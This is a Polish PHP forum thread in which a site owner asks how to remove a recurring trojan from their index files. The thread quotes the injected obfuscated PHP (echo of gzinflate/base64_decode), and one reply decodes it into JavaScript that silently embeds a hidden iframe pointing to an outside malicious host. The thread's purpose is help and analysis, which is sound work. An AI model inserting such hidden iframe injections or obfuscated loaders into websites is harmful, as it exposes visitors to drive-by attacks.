Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
 Reply to this topicStart new topic
> gzinflate, base64_decode - trojan
Athread
post
Post #1





Grupa: Zarejestrowani
Postów: 12
Pomógł: 0
Dołączył: 13.06.2011

Ostrzeżenie: (0%)
-----

W plikach index pojawiło mi się takie coś

[PHP] pobierz, plaintext 
  1. #c54471#
  2. echo(gzinflate(base64_decode("zVZLc5swEP4rLRcgTAgSSMAQ9dDHIeceMzk4BmIyCbZBqcf2hN9erSRk7NgOzXSmnTEyWu3ut29
    03U6basG/5Oz7hBdZzupi9Sl33GzGLheTpi1uau7YAcK2e0WyqnRWVZ3PV34+n748FzV3ebPeShlN8B8K/uOpgNev65vcsZarwnL9RTPnc75eFK/TCZ/OnOVy6W5bzn7ypqofss2G2ZMnW/7/sr3NJmtbZlkAiNxtyezS9uxGPHPxPIvn20wsk8bOSlaKHZzkYins7LVgfFa1t6Xfvty3vHEQcoXCu4wz
    ey2Oa2aFPungIQiWoEOkQ2kXpR2JBCFKgBrDAkxRCm+RoHQYC25DirtQKgn1/oCZUEAREkCKUBdJjSAeJnpjJAQ6SiS0NiFVYpKIpAIgYwFFegoFVUR7cugRoYcQggIo8IqTA0kKUqhnD
    JXpyrATOONilShcZVS8c5V2OD1jKiLKAjgBFdiEgiAZWfEDLwQGnOKdHuWoYQQrqWTRaJHmNhvtQNATQ3
    jDsQk90U4g7XMMmnf24FBlxTAjbQPaaZXBOC1BVWxIOiilgcOJ1kWNFT0lNHElKqkSSxsqf9pJqYeofO3
    0SFf8ngxsKg2gnxp6qJOrk6d09QUfSNcScEcdxFqKDKnSjzCAlA+CfyzvggnRcyU6JEh0ZXqUHPEHjWyG
    423UdyiVeuSEwGnfJCNKP9KlL6nRMIRnZ0Y/B870hpkIKkSBLG46HEp9dmPTe5DT+KAHE/+gy1R5on/UaMc8etMW+E/6YW9ovG0L5e4IxPc7xyC930CjUfd7bDA+xqsYdOO78h8pnreDca+E9ifd36rYEwN2FPKHvmH/w/ce2ifWU3yHKYRCPKhvaRiohnl1cohafrt4qrhjTTrL3JBcNyvnjVOxIKs+M0LDrPI8d/vIKriHta3X8tvyzrmcXTj4Ennoor59vBNCr/J+thQccFPbbNzCsSxv6WbXV/pe+Rs="    )));
  3. #/c54471#
[PHP] pobierz, plaintext


przy wchodzeniu na stronę wyskakuje, że jest trojan. Jak sobie z tym poradzić ? Po usunięciu ręcznie pojawia się znowu.
Nie wiedziałem dokładnie w który dział wrzucić.
Go to the top of the page
+Quote Post
toffiak
post
Post #2





Grupa: Zarejestrowani
Postów: 395
Pomógł: 80
Dołączył: 24.08.2009

Ostrzeżenie: (0%)
-----

Na początek przeskanuj komputer i zmień dane do ftp
Go to the top of the page
+Quote Post
redeemer
post
Post #3





Grupa: Zarejestrowani
Postów: 915
Pomógł: 210
Dołączył: 8.09.2009
Skąd: Tomaszów Lubelski/Wrocław

Ostrzeżenie: (0%)
-----

Dla ciekawości tak wygląda zdekodowany:
[HTML] pobierz, plaintext 
  1. if (document.getElementsByTagName('body')[0])
  2. { 
  3. 	iframer(); 
  4. } else { 
  5. 	document.write("<iframe src='http://freshtds.in/in.cgi?9' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
  6. } 
  7.  
  8. function iframer(){ 
  9. 	var f = document.createElement('iframe');
  10. 	f.setAttribute('src','http://freshtds.in/in.cgi?9');
  11. 	f.style.visibility='hidden';
  12. 	f.style.position='absolute';
  13. 	f.style.left='0';
  14. 	f.style.top='0';
  15. 	f.setAttribute('width','10');
  16. 	f.setAttribute('height','10'); 
  17. 	document.getElementsByTagName('body')[0].appendChild(f); 
  18. }
[HTML] pobierz, plaintext
Go to the top of the page
+Quote Post
« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 29.09.2025 - 21:05
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn